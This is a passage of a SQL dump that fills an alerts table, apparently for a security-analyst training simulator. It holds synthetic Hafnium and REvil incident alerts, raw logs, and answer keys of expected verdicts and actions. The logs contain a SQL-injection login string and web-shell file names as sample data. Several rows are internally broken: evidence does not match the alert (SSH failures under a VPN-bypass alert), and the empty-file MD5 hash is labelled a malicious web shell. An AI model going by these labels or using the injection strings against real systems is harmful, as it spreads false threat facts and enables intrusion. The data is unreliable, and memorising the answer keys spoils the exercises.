4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"192.168.100.100\\\",\\\"hostname\\\":\\\"qrscanner.retailcorp.com\\\",\\\"url\\\":\\\"https://marketing.retailcorp.com/qrcampaign\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(855, 'False Positive: Unusual Network Traffic from Internal Server', 'medium', 'Firewall', 'An internal server generated unusual network traffic. Further analysis confirmed this is part of a scheduled data backup.', 'Data Exfil', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T14:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.50.10\",\"dst_ip\":\"10.0.0.20\",\"hostname\":\"backupserver.retailcorp.com\"}', '2026-01-14 15:31:54', '2026-02-26 22:00:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal server used for scheduled backups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal backup destination\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network traffic matched scheduled backup patterns, confirming false positive.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(856, 'Initial Access via VPN Authentication Bypass', 'high', 'SIEM logs from VPN appliances', 'Hafnium exploits authentication bypass vulnerabilities in Pulse Secure, Fortinet, and Citrix VPNs to establish initial access to targeted networks.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"vpn_appliance\":\"Pulse Secure\",\"event_type\":\"authentication_bypass\",\"src_ip\":\"185.92.220.45\",\"internal_ip\":\"192.168.10.22\",\"username\":\"admin\",\"session_id\":\"93fj29fj2\",\"vulnerability_exploited\":\"CVE-2021-22893\",\"file_accessed\":\"/etc/passwd\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Hafnium activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with suspicious activity but not conclusively malicious.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"clean\",\"details\":\"Commonly used administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.519Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:32:45Z\\\",\\\"vpn_appliance\\\":\\\"Pulse 
Secure\\\",\\\"event_type\\\":\\\"authentication_bypass\\\",\\\"src_ip\\\":\\\"185.92.220.45\\\",\\\"internal_ip\\\":\\\"192.168.10.22\\\",\\\"username\\\":\\\"admin\\\",\\\"session_id\\\":\\\"93fj29fj2\\\",\\\"vulnerability_exploited\\\":\\\"CVE-2021-22893\\\",\\\"file_accessed\\\":\\\"/etc/passwd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(857, 'Web Shell Deployment for Remote Execution', 'high', 'Web server logs', 'Hafnium has deployed a web shell on a compromised web server to execute commands remotely. This is a typical step used by adversaries to maintain persistence and control over the system.', 'Execution', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"POST\",\"uri\":\"/uploads/shell.jsp\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"status_code\":200,\"response_size\":512,\"username\":\"webadmin\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP address used in previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal web server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Web shell used for remote execution.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known web shell.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.520Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"http_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":512,\\\"username\\\":\\\"webadmin\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(858, 'Establishing Persistence with Web Shells', 'medium', 'File integrity monitoring', 'A web shell was detected on the server, indicating a potential persistence mechanism established by the attacker to maintain long-term access. The presence of unauthorized files suggests a compromise.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"event_time\":\"2023-10-02T14:23:45Z\",\"event_type\":\"file_creation\",\"file_path\":\"/var/www/html/suspicious_shell.php\",\"new_file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"username\":\"webadmin\",\"action\":\"create\",\"internal_ip\":\"192.168.1.15\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"/var/www/html/suspicious_shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known web shell used for post-exploitation.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious web shell activity.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Common administrative username.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.521Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-02T14:23:45Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"file_path\\\":\\\"/var/www/html/suspicious_shell.php\\\",\\\"new_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"webadmin\\\",\\\"action\\\":\\\"create\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(859, 'Lateral Movement Detected - Hafnium Operation', 'high', 'Network traffic analysis', 'Observed lateral movement activity consistent with Hafnium APT group tactics. A compromised internal host was used to authenticate to multiple devices using stolen credentials. Data exfiltration attempts were detected targeting files typically associated with sensitive defense information.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.76\",\"username\":\"jdoe\",\"success\":true,\"action\":\"login\",\"file_accessed\":\"/srv/data/defense_project.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"SMB\",\"description\":\"User jdoe successfully authenticated from internal IP 192.168.1.105 to host 10.0.0.15 and accessed sensitive file defense_project.zip. Network traffic originates from known malicious IP 203.0.113.76, suggesting possible credential compromise.\"}', '2026-01-15 00:50:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with Hafnium APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Hash observed in unauthorized access attempts\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"internal\",\"details\":\"User account possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(860, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System', 'Initial access was achieved by exploiting a vulnerability in Kaseya VSA, allowing REvil to infiltrate managed service providers\' networks.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T15:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"vulnerability_exploited\":\"Kaseya VSA zero-day\",\"malware_hash\":\"a3f5e2b1c3d4e5f678901234567890ab\",\"filename\":\"kaseya_vsa_exploit.exe\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-site.com/exploit\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address of compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5e2b1c3d4e5f678901234567890ab\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil malware.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-site.com/exploit\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"URL hosting exploit payload for Kaseya VSA.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(861, 'Malicious Script Execution on Endpoint', 'high', 'Endpoint Detection and Response', 'Upon gaining access, REvil executed malicious scripts to deploy ransomware across affected systems, encrypting vital data.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.20\",\"user\":\"jdoe\",\"process\":\"powershell.exe\",\"script_name\":\"encrypt_payload.ps1\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\encrypt_payload.ps1\",\"severity\":\"High\",\"event_id\":\"4625\",\"description\":\"Malicious script executed by powershell.exe\"}', '2026-01-15 00:50:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypt_payload.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script used to deploy 